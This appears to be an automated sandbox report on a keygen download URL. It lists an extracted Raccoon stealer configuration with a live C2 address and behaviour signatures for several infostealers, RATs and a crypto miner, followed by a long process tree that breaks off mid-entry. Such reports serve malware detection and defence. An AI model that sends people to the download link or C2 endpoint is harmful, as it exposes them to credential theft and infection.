Resubmissions

17-04-2021 18:41

210417-4m6sdqyqx2 10

17-04-2021 06:29

210417-mvqz54c7re 10

16-04-2021 14:15

210416-aa5qqagyce 10

Analysis

  • max time kernel
    1799s
  • max time network
    1455s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    16-04-2021 14:15

General

  • Target

    https://keygenit.com/d/a941ad21e610ns219454.html

  • Sample

    210416-aa5qqagyce

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 57 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 15 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2812
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2696
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2680
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/a941ad21e610ns219454.html
        1⤵
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4044
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffb93804f50,0x7ffb93804f60,0x7ffb93804f70
          2⤵
            PID:3704
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1656 /prefetch:2
            2⤵
              PID:2716
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1704 /prefetch:8
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2824
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2196 /prefetch:8
              2⤵
                PID:4000
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2884 /prefetch:1
                2⤵
                  PID:2008
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2892 /prefetch:1
                  2⤵
                    PID:2676
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                    2⤵
                      PID:1192
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
                      2⤵
                        PID:1516
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
                        2⤵
                          PID:760
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
                          2⤵
                            PID:196
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4744 /prefetch:8
                            2⤵
                              PID:4248
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5256 /prefetch:8
                              2⤵
                                PID:4516
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5412 /prefetch:8
                                2⤵
                                  PID:4580
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5528 /prefetch:8
                                  2⤵
                                    PID:4632
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5644 /prefetch:8
                                    2⤵
                                      PID:4668
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:8
                                      2⤵
                                        PID:4704
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5460 /prefetch:8
                                        2⤵
                                          PID:4736
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5620 /prefetch:8
                                          2⤵
                                            PID:4776
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5632 /prefetch:8
                                            2⤵
                                              PID:4788
                                            • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                              "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                              2⤵
                                                PID:4848
                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6a202a890,0x7ff6a202a8a0,0x7ff6a202a8b0
                                                  3⤵
                                                    PID:4904
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5392 /prefetch:8
                                                  2⤵
                                                    PID:4868
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:8
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4968
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5312 /prefetch:8
                                                    2⤵
                                                      PID:4980
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5648 /prefetch:8
                                                      2⤵
                                                        PID:5016
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5528 /prefetch:8
                                                        2⤵
                                                          PID:5080
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5644 /prefetch:8
                                                          2⤵
                                                            PID:5092
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5748 /prefetch:8
                                                            2⤵
                                                              PID:3380
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5772 /prefetch:8
                                                              2⤵
                                                                PID:2724
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5732 /prefetch:8
                                                                2⤵
                                                                  PID:4308
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:8
                                                                  2⤵
                                                                    PID:4344
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5692 /prefetch:8
                                                                    2⤵
                                                                      PID:4304
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5444 /prefetch:8
                                                                      2⤵
                                                                        PID:4596
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6672 /prefetch:8
                                                                        2⤵
                                                                          PID:4620
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6832 /prefetch:8
                                                                          2⤵
                                                                            PID:4664
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6960 /prefetch:8
                                                                            2⤵
                                                                              PID:4728
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7124 /prefetch:8
                                                                              2⤵
                                                                                PID:4720
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7120 /prefetch:8
                                                                                2⤵
                                                                                  PID:4768
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8080 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4836
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8072 /prefetch:8
                                                                                    2⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4892
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8244 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4976
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8384 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4576
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8364 /prefetch:8
                                                                                        2⤵
                                                                                          PID:2124
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8620 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4584
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8768 /prefetch:8
                                                                                            2⤵
                                                                                              PID:5116
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7648 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4688
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7660 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4800
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8024 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4872
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9076 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4524
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9196 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4548
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9208 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4556
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6992 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:4572
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:4732
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8216 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:4888
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8768 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:4808
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:4836
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4292 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5020
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8904 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:4348
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=772 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:4828
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:4668
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8753594169569754340,13635567650050832222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4796 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:4760
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                    1⤵
                                                                                                                      PID:2472
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                      1⤵
                                                                                                                        PID:2436
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                        1⤵
                                                                                                                          PID:1900
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                          1⤵
                                                                                                                          • Modifies registry class
                                                                                                                          PID:1444
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                          1⤵
                                                                                                                            PID:1300
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                            1⤵
                                                                                                                              PID:1236
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                              1⤵
                                                                                                                                PID:1084
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                1⤵
                                                                                                                                  PID:864
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:356
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
